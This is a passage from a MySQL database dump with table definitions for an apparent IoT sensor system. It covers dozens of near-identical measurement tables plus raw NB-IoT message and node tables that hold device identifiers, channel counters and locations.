CREATE TABLE `measurement44` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement45`
--
DROP TABLE IF EXISTS `measurement45`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement45` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement46`
--
DROP TABLE IF EXISTS `measurement46`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement46` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement47`
--
DROP TABLE IF EXISTS `measurement47`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement47` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement48`
--
DROP TABLE IF EXISTS `measurement48`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement48` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement49`
--
DROP TABLE IF EXISTS `measurement49`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement49` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement50`
--
DROP TABLE IF EXISTS `measurement50`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement50` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement51`
--
DROP TABLE IF EXISTS `measurement51`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement51` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement52`
--
DROP TABLE IF EXISTS `measurement52`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement52` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement53`
--
DROP TABLE IF EXISTS `measurement53`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement53` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement54`
--
DROP TABLE IF EXISTS `measurement54`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement54` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement55`
--
DROP TABLE IF EXISTS `measurement55`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement55` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement56`
--
DROP TABLE IF EXISTS `measurement56`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement56` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement57`
--
DROP TABLE IF EXISTS `measurement57`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement57` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement58`
--
DROP TABLE IF EXISTS `measurement58`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement58` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement59`
--
DROP TABLE IF EXISTS `measurement59`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement59` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement6`
--
DROP TABLE IF EXISTS `measurement6`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement6` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement60`
--
DROP TABLE IF EXISTS `measurement60`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement60` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement61`
--
DROP TABLE IF EXISTS `measurement61`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement61` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement62`
--
DROP TABLE IF EXISTS `measurement62`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement62` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement63`
--
DROP TABLE IF EXISTS `measurement63`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement63` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement64`
--
DROP TABLE IF EXISTS `measurement64`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement64` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement65`
--
DROP TABLE IF EXISTS `measurement65`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement65` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement66`
--
DROP TABLE IF EXISTS `measurement66`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement66` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement67`
--
DROP TABLE IF EXISTS `measurement67`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement67` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement68`
--
DROP TABLE IF EXISTS `measurement68`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement68` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement69`
--
DROP TABLE IF EXISTS `measurement69`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement69` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement7`
--
DROP TABLE IF EXISTS `measurement7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement7` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement70`
--
DROP TABLE IF EXISTS `measurement70`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement70` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement71`
--
DROP TABLE IF EXISTS `measurement71`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement71` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement72`
--
DROP TABLE IF EXISTS `measurement72`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement72` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement73`
--
DROP TABLE IF EXISTS `measurement73`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement73` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement74`
--
DROP TABLE IF EXISTS `measurement74`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement74` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement75`
--
DROP TABLE IF EXISTS `measurement75`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement75` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement76`
--
DROP TABLE IF EXISTS `measurement76`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement76` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement77`
--
DROP TABLE IF EXISTS `measurement77`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement77` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement78`
--
DROP TABLE IF EXISTS `measurement78`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement78` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement79`
--
DROP TABLE IF EXISTS `measurement79`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement79` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement8`
--
DROP TABLE IF EXISTS `measurement8`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement8` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement80`
--
DROP TABLE IF EXISTS `measurement80`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement80` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement81`
--
DROP TABLE IF EXISTS `measurement81`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement81` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement82`
--
DROP TABLE IF EXISTS `measurement82`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement82` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement83`
--
DROP TABLE IF EXISTS `measurement83`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement83` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement84`
--
DROP TABLE IF EXISTS `measurement84`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement84` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement85`
--
DROP TABLE IF EXISTS `measurement85`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement85` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement86`
--
DROP TABLE IF EXISTS `measurement86`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement86` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement87`
--
DROP TABLE IF EXISTS `measurement87`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement87` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement88`
--
DROP TABLE IF EXISTS `measurement88`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement88` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement89`
--
DROP TABLE IF EXISTS `measurement89`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement89` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement9`
--
DROP TABLE IF EXISTS `measurement9`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement9` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement90`
--
DROP TABLE IF EXISTS `measurement90`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement90` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement91`
--
DROP TABLE IF EXISTS `measurement91`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement91` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement92`
--
DROP TABLE IF EXISTS `measurement92`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement92` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement93`
--
DROP TABLE IF EXISTS `measurement93`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement93` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement94`
--
DROP TABLE IF EXISTS `measurement94`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement94` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement95`
--
DROP TABLE IF EXISTS `measurement95`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement95` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement96`
--
DROP TABLE IF EXISTS `measurement96`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement96` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement97`
--
DROP TABLE IF EXISTS `measurement97`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement97` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement98`
--
DROP TABLE IF EXISTS `measurement98`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement98` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement99`
--
DROP TABLE IF EXISTS `measurement99`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement99` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `nbiotraw`
--
DROP TABLE IF EXISTS `nbiotraw`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `nbiotraw` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Data` mediumtext NOT NULL,
`Moment` datetime NOT NULL,
`Processed` tinyint(4) NOT NULL DEFAULT '0',
`Nodeid` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
KEY `nodeid` (`Nodeid`),
KEY `processed` (`Processed`),
KEY `moment` (`Moment`)
) ENGINE=MyISAM AUTO_INCREMENT=3690 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `node`
--
DROP TABLE IF EXISTS `node`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `node` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Name` text,
`Lastlocationlat` decimal(10,5) DEFAULT NULL,
`Lastlocationlon` decimal(10,5) DEFAULT NULL,
`Devid` text NOT NULL,
`Hwserial` text NOT NULL,
`Ch0` bigint(20) NOT NULL DEFAULT '0',
`Ch1` bigint(20) NOT NULL DEFAULT '0',
`Ch2` bigint(20) NOT NULL DEFAULT '0',
`Ch3` bigint(20) NOT NULL DEFAULT '0',
`Ch4` bigint(20) NOT NULL DEFAULT '0',
`Ch5` bigint(20) NOT NULL DEFAULT '0',
`Ch6` bigint(20) NOT NULL DEFAULT '0',
`Ch7` bigint(20) NOT NULL DEFAULT '0',
`Sf7` bigint(20) NOT NULL DEFAULT '0',
`Sf8` bigint(20) NOT NULL DEFAULT '0',
`Sf9` bigint(20) NOT NULL DEFAULT '0',
`Sf10` bigint(20) NOT NULL DEFAULT '0',
